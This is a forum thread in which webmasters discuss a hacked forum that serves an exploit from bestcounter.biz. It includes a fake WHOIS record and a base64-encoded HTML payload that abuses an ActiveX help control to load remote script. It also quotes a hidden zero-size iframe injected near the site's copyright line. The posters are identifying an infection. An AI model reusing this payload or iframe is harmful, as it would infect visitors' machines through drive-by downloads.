|
Exploit at Choker's forum?
http://img129.echo.cx/img129/1086/cl...e0026dr.th.jpg
This thing pops up at the main forum with each and every reload... is it an exploit or sth bad? Somehow, when a file with the name newEXPL tries to load, it doesn't conjure good thoughts. |
Quote:
|
sleazy hacked him!
|
|
He been fucking with someone from Haiti :1orglaugh
newexpl.zip http://bestcounter.biz [DOMAIN whois information for BESTCOUNTER.BIZ ] Domain Name: BESTCOUNTER.BIZ Namespace: ICANN Unsponsored Generic TLD - http://www.icann.org TLD Info: See IANA Whois - http://www.iana.org/root-whois/biz.htm Registry: NeuLevel - http://www.neulevel.biz Registrar: DIRECT INFORMATION PVT. LTD., (D.B.A. DIRECTI.COM) - http://www.directi.com Whois Server: whois.biz Name Server[from whois+dns, dns ip]: NS2.BESTCOUNTER.BIZ 195.95.218.172 Name Server[from whois+dns, dns ip]: NS1.BESTCOUNTER.BIZ 195.95.218.170 Status: ok Creation Date: Mon Jan 31 21:47:30 GMT 2005 Expiration Date: Tue Jan 30 23:59:59 GMT 2007 Updated Date: Fri Jun 03 02:20:05 GMT 2005 [whois.biz] Domain Name: BESTCOUNTER.BIZ Domain ID: D8873108-BIZ Sponsoring Registrar: DIRECT INFORMATION PVT. LTD., (D.B.A. DIRECTI.COM) Sponsoring Registrar IANA ID: 303 Domain Status: ok Registrant ID: DI_343543 Registrant Name: Vasiliy Pupkin Registrant Organization: Online service Registrant Address1: Bolshaya street Registrant City: Lumumba Registrant State/Province: None USA resident Registrant Postal Code: 123456 Registrant Country: Haiti Registrant Country Code: HT Registrant Phone Number: +1.23456789 Registrant Email: [email protected] Administrative Contact ID: DI_343543 Administrative Contact Name: Vasiliy Pupkin Administrative Contact Organization: Online service Administrative Contact Address1: Bolshaya street Administrative Contact City: Lumumba Administrative Contact State/Province: None USA resident Administrative Contact Postal Code: 123456 Administrative Contact Country: Haiti Administrative Contact Country Code: HT Administrative Contact Phone Number: +1.23456789 Administrative Contact Email: [email protected] Billing Contact ID: DI_343543 Billing Contact Name: Vasiliy Pupkin Billing Contact Organization: Online service Billing Contact Address1: Bolshaya street Billing Contact City: Lumumba Billing Contact State/Province: None USA resident Billing Contact Postal Code: 123456 Billing Contact Country: Haiti Billing Contact Country Code: HT Billing Contact Phone Number: +1.23456789 Billing Contact Email: [email protected] Technical Contact ID: DI_343543 Technical Contact Name: Vasiliy Pupkin Technical Contact Organization: Online service Technical Contact Address1: Bolshaya street Technical Contact City: Lumumba Technical Contact State/Province: None USA resident Technical Contact Postal Code: 123456 Technical Contact Country: Haiti Technical Contact Country Code: HT Technical Contact Phone Number: +1.23456789 Technical Contact Email: [email protected] Name Server: NS2.BESTCOUNTER.BIZ Name Server: NS1.BESTCOUNTER.BIZ Created by Registrar: DIRECT INFORMATION PVT. LTD., (D.B.A. DIRECTI.COM) Last Updated by Registrar: DIRECT INFORMATION PVT. LTD., (D.B.A. DIRECTI.COM) Domain Registration Date: Mon Jan 31 21:47:30 GMT 2005 Domain Expiration Date: Tue Jan 30 23:59:59 GMT 2007 Domain Last Updated Date: Fri Jun 03 02:20:05 GMT 2005 |
Lol, the contents of that PHP file are below... looks like a mailer of some sorts, but what do I know?
From: <x> Subject: x MIME-Version: 1.0 Content-Type: text/html; charset="utf-8" Content-Transfer-Encoding: base64 PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE 1MIDQuMCBUcmFuc2l0aW9uYWwvL0VOIj4KPEhUTUw+PEJPRFk+ CjxPQkpFQ1Qgc3R5bGU9ImRpc3BsYXk6bm9uZSIgaWQ9ImFzZH F3ZSIgY2xhc3NpZD0iY2xzaWQ6YWRiODgwYTYtZDhmZi0xMWNm LTkzNzctMDBhYTAwM2I3YTExIj4KPFBBUkFNIG5hbWU9IkNvbW 1hbmQiIHZhbHVlPSJSZWxhdGVkIFRvcGljcywgTUVOVSI+CjxQ QVJBTSBuYW1lPSJCdXR0b24iIHZhbHVlPSJUZXh0Ol8iPgo8UE FSQU0gbmFtZT0iV2luZG93IiB2YWx1ZT0iJGdsb2JhbF9ibGFu ayI+CjxQQVJBTSBuYW1lPSJJdGVtMSIgdmFsdWU9ImNvbW1hbm Q7bXMtaXRzOmM6L3dpbmRvd3MvaGVscC9udHNoYXJlZC5jaG06 Oi9hbHRfdXJsX2VudGVycHJpc2Vfc3BlY2lmaWMuaHRtIj4KPC 9PQkpFQ1Q+CjxPQkpFQ1Qgc3R5bGU9ImRpc3BsYXk6bm9uZSIg aWQ9ImFzZHF3ZXIiIGNsYXNzaWQ9ImNsc2lkOmFkYjg4MGE2LW Q4ZmYtMTFjZi05Mzc3LTAwYWEwMDNiN2ExMSI+CjxQQVJBTSBu YW1lPSJDb21tYW5kIiB2YWx1ZT0iUmVsYXRlZCBUb3BpY3MsIE 1FTlUiPgo8UEFSQU0gbmFtZT0iQnV0dG9uIiB2YWx1ZT0iVGV4 dDpfIj4KPFBBUkFNIG5hbWU9IldpbmRvdyIgdmFsdWU9IiRnbG 9iYWxfYmxhbmsiPgo8UEFSQU0gbmFtZT0iSXRlbTEiIHZhbHVl PSdjb21tYW5kOyBqYXZhc2NyaXB0OmV4ZWNTY3JpcHQoImRvY3 VtZW50LndyaXRlKFwiPHNjcmlwdCBzcmM9aHR0cDovL2Jlc3Rj b3VudGVyLmJpei9kbC9hZHY0MzkvSlFUbXVkSS5qcGdcIitTdH JpbmcuZnJvbUNoYXJDb2RlKDYyKStcIjwvc2NyXCIrXCJpcHRc IitTdHJpbmcuZnJvbUNoYXJDb2RlKDYyKSkiKSc+CjwvT0JKRU NUPgo8c2NyaXB0PmFzZHF3ZS5ISENsaWNrKCk7c2V0VGltZW91 dCgiYXNkcXdlci5ISENsaWNrKCkiLDEwMCk7c2V0VGltZW91dC giZG9jdW1lbnQud3JpdGUoJycpIiwyMDApPC9zY3JpcHQ+PC9C T0RZPjwvSFRNTD4= |
i dont see anything . what url are you viewing..? you might be infected.
|
EDIT. deleted the url since I don't wanna get banned for posting the url to another board.
|
wrong thread....
|
Quote:
And I'm sure it's from his site coz it's hardcoded into the HTML! Just view the source... it's hidden at the bottom near the copyrights. <span class="genmed">Support for http://www.betterbeup.com<iframe src="http://bestcounter.biz/dl/adv439.php" width=0 height=0 style="display:none"></iframe></span> |
is this a drama thread?
|
This russian sponsor will prolly change the url for stats one day ... for months we can look into their pannel
Stats |
Quote:
|
hmm wait now i do see it on the main page.. strange it wasnt there the first 2 times i checked.. well choker is hacked then
|
|
| All times are GMT -7. The time now is 02:56 PM. |
Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123